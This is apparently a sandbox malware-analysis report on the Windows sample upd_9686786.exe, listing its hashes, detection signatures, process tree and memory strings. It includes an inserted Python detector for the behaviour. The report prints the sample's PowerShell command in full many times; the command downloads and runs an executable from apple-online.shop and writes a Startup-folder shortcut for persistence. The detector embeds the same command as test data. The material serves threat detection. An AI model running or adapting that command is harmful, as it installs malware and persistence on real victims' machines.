Windows Analysis Report
upd_9686786.exe

Overview

General Information

Sample name: upd_9686786.exe
Analysis ID: 1523560
MD5: 22f545cf93f55d3294abbbc7bfbbd6b8
SHA1: 9f3fcce983368fe70ddf070919f2516981934885
SHA256: b93d7961d05376e6aa0e6d122ae50f34db078acc9e95ed6408f39750d386a74a

Detection

Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Powershell creates an autostart link
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Suspicious Invoke-WebRequest Execution
Suspicious powershell command line found
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: PowerShell Web Download
Sigma detected: Startup Folder File Write
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64native
  • upd_9686786.exe (PID: 7588 cmdline: "C:\Users\user\Desktop\upd_9686786.exe" MD5: 22F545CF93F55D3294ABBBC7BFBBD6B8)
    • powershell.exe (PID: 816 cmdline: powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2288 cmdline: cmd.exe /c systeminfo MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • systeminfo.exe (PID: 6456 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
  • upd_9686786.exe (PID: 8512 cmdline: "C:\Users\user\Desktop\upd_9686786.exe" MD5: 22F545CF93F55D3294ABBBC7BFBBD6B8)
    • powershell.exe (PID: 8620 cmdline: powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8628 cmdline: cmd.exe /c systeminfo MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • systeminfo.exe (PID: 8736 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: File created | Author: Christopher Peacock '@securepeacock', SCYTHE | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 816, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tuygh.lnk
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()", CommandLine: powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\upd_9686786.exe", ParentImage: C:\Users\user\Desktop\upd_9686786.exe, ParentProcessId: 7588, ParentProcessName: upd_9686786.exe, ProcessCommandLine: powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()", ProcessId: 816, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()", CommandLine: powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\upd_9686786.exe", ParentImage: C:\Users\user\Desktop\upd_9686786.exe, ParentProcessId: 7588, ParentProcessName: upd_9686786.exe, ProcessCommandLine: powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()", ProcessId: 816, ProcessName: powershell.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 816, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tuygh.lnk
Source: Process started | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger | Data: Command: powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()", CommandLine: powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\upd_9686786.exe", ParentImage: C:\Users\user\Desktop\upd_9686786.exe, ParentProcessId: 7588, ParentProcessName: upd_9686786.exe, ProcessCommandLine: powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()", ProcessId: 816, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()", CommandLine: powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\upd_9686786.exe", ParentImage: C:\Users\user\Desktop\upd_9686786.exe, ParentProcessId: 7588, ParentProcessName: upd_9686786.exe, ProcessCommandLine: powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()", ProcessId: 816, ProcessName: powershell.exe
No Suricata rule has matched
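Every Sigma match above fires on the same two events from ProcessId 816: the powershell.exe process-create whose command line chains Invoke-WebRequest -OutFile, execution of the download, and a WScript.Shell CreateShortcut call aimed at the Startup folder, and the file-create of tuygh.lnk in that folder. The Python below is an added example, not part of the Joe Sandbox report or of the sample, that implements that detection over Sysmon-style events modelled as dicts. The PID 816 events are constructed from the values printed in this report; the PID 4120 events and the rule names are invented for contrast.

```python
"""Detect the download-then-Startup-shortcut chain seen in this report.

EventID 1 = process create, EventID 11 = file create (Sysmon field names).
Each rule inspects one event; analyse() then correlates hits by ProcessId.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Path fragment shared by the per-user and all-users Startup folders.
STARTUP_DIR = "\\microsoft\\windows\\start menu\\programs\\startup\\"
PS_IMAGES = ("\\powershell.exe", "\\pwsh.exe")

# Web-download cmdlets and aliases covered by the Sigma rules cited above.
WEB_CMDLETS = re.compile(r"\b(invoke-webrequest|iwr|invoke-restmethod|irm|curl|wget)\b", re.I)
OUTFILE = re.compile(r"-outfile\b", re.I)
# WScript.Shell instantiated and CreateShortcut( called later in the same line.
SHORTCUT_API = re.compile(r"wscript\.shell.*?createshortcut\s*\(", re.I | re.S)
URL_RE = re.compile(r"https?://[^\s\"'\\;)]+", re.I)
# Single-quoted absolute Windows paths, e.g. the $programPath literal.
QUOTED_PATH = re.compile(r"'([A-Za-z]:\\[^']+)'")


@dataclass
class Finding:
    rule: str
    process_id: int
    evidence: Dict[str, object]


def is_powershell(image: str) -> bool:
    return image.lower().endswith(PS_IMAGES)


def check_process_create(ev: dict) -> List[Finding]:
    """Rules over an EventID 1 event for a PowerShell host."""
    if ev.get("EventID") != 1 or not is_powershell(ev.get("Image", "")):
        return []
    cmd = ev.get("CommandLine", "")
    found = []
    # Download to disk: a web cmdlet AND -OutFile (a bare Invoke-WebRequest is too noisy alone).
    if WEB_CMDLETS.search(cmd) and OUTFILE.search(cmd):
        found.append(Finding("powershell_web_download", ev["ProcessId"],
                             {"urls": URL_RE.findall(cmd)}))
    # Shortcut creation that names a Startup folder in the command line itself.
    if SHORTCUT_API.search(cmd) and "startup" in cmd.lower():
        found.append(Finding("powershell_startup_shortcut_cmdline", ev["ProcessId"],
                             {"targets": QUOTED_PATH.findall(cmd)}))
    return found


def check_file_create(ev: dict) -> List[Finding]:
    """Rule over an EventID 11 event: any .lnk written into a Startup folder."""
    if ev.get("EventID") != 11:
        return []
    target = ev.get("TargetFilename", "")
    low = target.lower()
    if STARTUP_DIR in low and low.endswith(".lnk"):
        rule = ("startup_lnk_via_powershell" if is_powershell(ev.get("Image", ""))
                else "startup_lnk_write")
        return [Finding(rule, ev["ProcessId"], {"lnk": target})]
    return []


def analyse(events: List[dict]) -> List[Finding]:
    """Run all rules, then escalate a PID that both downloaded a file and wrote a Startup .lnk."""
    findings: List[Finding] = []
    for ev in events:
        findings += check_process_create(ev)
        findings += check_file_create(ev)
    rules_by_pid: Dict[int, set] = {}
    for f in findings:
        rules_by_pid.setdefault(f.process_id, set()).add(f.rule)
    for pid, rules in rules_by_pid.items():
        if {"powershell_web_download", "startup_lnk_via_powershell"} <= rules:
            findings.append(Finding("download_then_startup_persistence", pid,
                                    {"rules": sorted(rules)}))
    return findings


# Constructed sample input: PID 816 copies the report's own command line and
# .lnk path; PID 4120 is an invented benign PowerShell session.
MALICIOUS_CMD = (
    'powershell.exe -Command "Invoke-WebRequest -Uri \\"https://apple-online.shop/MicrosoftEdgeSetup.exe\\"'
    ' -OutFile \\"$env:TMP/MicrosoftEdgeSetup.exe\\" ; & \\"$env:TMP/MicrosoftEdgeSetup.exe\\" ;'
    " $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\\Windows\\Start Menu\\Programs\\Startup') ;"
    " $programPath = 'C:\\Users\\user\\Desktop\\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ;"
    " $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ;"
    " $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ;"
    " $shortcut.TargetPath = $programPath ;"
    ' $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()"'
)
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 816, "Image": PS_IMAGE,
     "ParentImage": r"C:\Users\user\Desktop\upd_9686786.exe", "CommandLine": MALICIOUS_CMD},
    {"EventID": 11, "ProcessId": 816, "Image": PS_IMAGE,
     "TargetFilename": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tuygh.lnk"},
    {"EventID": 1, "ProcessId": 4120, "Image": PS_IMAGE, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell.exe -Command "Get-ChildItem $env:TEMP | Measure-Object"'},
    {"EventID": 11, "ProcessId": 4120, "Image": PS_IMAGE,
     "TargetFilename": r"C:\Users\user\AppData\Local\Temp\report.txt"},
]

if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f"[{f.rule}] pid={f.process_id} {f.evidence}")
```

Run against the sample events, PID 816 produces the two command-line findings, the Startup .lnk finding and the correlated escalation, while PID 4120 produces nothing. The download rule deliberately requires -OutFile alongside the cmdlet so that ordinary Invoke-WebRequest usage does not page anyone; the .lnk rule fires for any writer, and is only tagged as the PowerShell variant when the Image is a PowerShell host, which is what lets the correlation step tie it back to the process-create.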

Source: upd_9686786.exe | Static PE information: certificate valid
Source: upd_9686786.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: ion.pdbS]K source: powershell.exe, 00000009.00000002.30279686077.00000215F4476000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.30276312197.0000020DF2D7E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 6?t.Automation.pdb+ source: powershell.exe, 00000009.00000002.30279975334.00000215F44BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdb source: powershell.exe, 00000009.00000002.30279975334.00000215F44BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System32\wshom.ocxb.pdb^ source: powershell.exe, 00000009.00000002.30279975334.00000215F44BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb6.1.4.1.311. source: powershell.exe, 00000009.00000002.30274860324.0000020DF2CF4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdbb source: powershell.exe, 00000002.00000002.30012245368.00000177764AA000.00000004.00000020.00020000.00000000.sdmp
Source: Joe Sandbox View | IP Address: 65.38.120.47
Source: Joe Sandbox View | IP Address: 217.148.142.19
Source: Joe Sandbox View | IP Address: 65.109.226.176
Source: C:\Users\user\Desktop\upd_9686786.exe | Code function: 0_2_00007FF76E65568B recv,recv,0_2_00007FF76E65568B
Source: powershell.exe, 00000002.00000002.29955133061.0000016F02B09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D82B02000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://apple-online.shop
Source: upd_9686786.exe | String found in binary or memory: http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0w
Source: upd_9686786.exe | String found in binary or memory: http://cevcsca2021.ocsp-certum.com07
Source: upd_9686786.exe | String found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: powershell.exe, 00000002.00000002.30006749495.0000016F74E50000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30270316321.0000020DF2A19000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: upd_9686786.exe | String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: upd_9686786.exe | String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: powershell.exe, 00000002.00000002.30006749495.0000016F74E50000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30264940359.0000020DF0A59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000002.00000002.29955133061.0000016F014F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29997866930.0000016F101BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29997866930.0000016F10079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29955133061.0000016F00235000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30256546918.0000020D901B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30256546918.0000020D90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D8022F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D81401000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: upd_9686786.exe | String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: upd_9686786.exe | String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: powershell.exe, 00000009.00000002.30156809218.0000020D81375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30270316321.0000020DF29F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.29955133061.0000016F00235000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D8022F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
Source: powershell.exe, 00000002.00000002.29955133061.0000016F0137B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29955133061.0000016F013A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D813A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D81375000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngh
Source: upd_9686786.exe | String found in binary or memory: http://repository.certum.pl/cevcsca2021.cer0
Source: upd_9686786.exe | String found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: powershell.exe, 00000002.00000002.29955133061.0000016F00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D80001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: upd_9686786.exe | String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: upd_9686786.exe | String found in binary or memory: http://subca.ocsp-certum.com02
Source: powershell.exe, 00000002.00000002.29955133061.0000016F00E9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D80E95000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000009.00000002.30156809218.0000020D81375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30270316321.0000020DF29F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.29955133061.0000016F00235000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D8022F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
Source: powershell.exe, 00000002.00000002.29955133061.0000016F0137B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29955133061.0000016F013A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D813A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D81375000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlh
Source: upd_9686786.exe | String found in binary or memory: http://www.certum.pl/CPS0
Source: powershell.exe, 00000002.00000002.30006749495.0000016F74E50000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30270316321.0000020DF2A19000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0
